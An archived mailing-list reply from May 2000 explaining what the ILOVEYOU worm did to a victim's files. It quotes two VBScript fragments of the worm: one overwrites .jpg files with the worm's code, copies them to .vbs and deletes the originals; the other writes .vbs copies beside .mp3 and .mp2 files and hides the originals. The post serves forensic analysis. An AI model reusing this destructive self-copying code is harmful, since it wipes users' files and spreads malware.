Vulnerability Development mailing list archives

Re: I love you Author evidence ?

From: sachsm () JTFCND IA MIL (Sachs, Marcus)
Date: Wed, 10 May 2000 08:46:16 -0400

If the script executed properly, the .jpg's were replaced by a copy of the
script and the originals deleted:

elseif(ext="jpg") or (ext="jpeg") then
      set ap=fso.OpenTextFile(f1.path,2,true)
      ap.write vbscopy
      ap.close
      set cop=fso.GetFile(f1.path)
      cop.copy(f1.path&".vbs")
      fso.DeleteFile(f1.path)

Only the .mp2's and .mp3's were hidden (attribute "2"):

elseif(ext="mp3") or (ext="mp2") then
      set mp3=fso.CreateTextFile(f1.path&".vbs")
      mp3.write vbscopy
      mp3.close
      set att=fso.GetFile(f1.path)
      att.attributes=att.attributes+2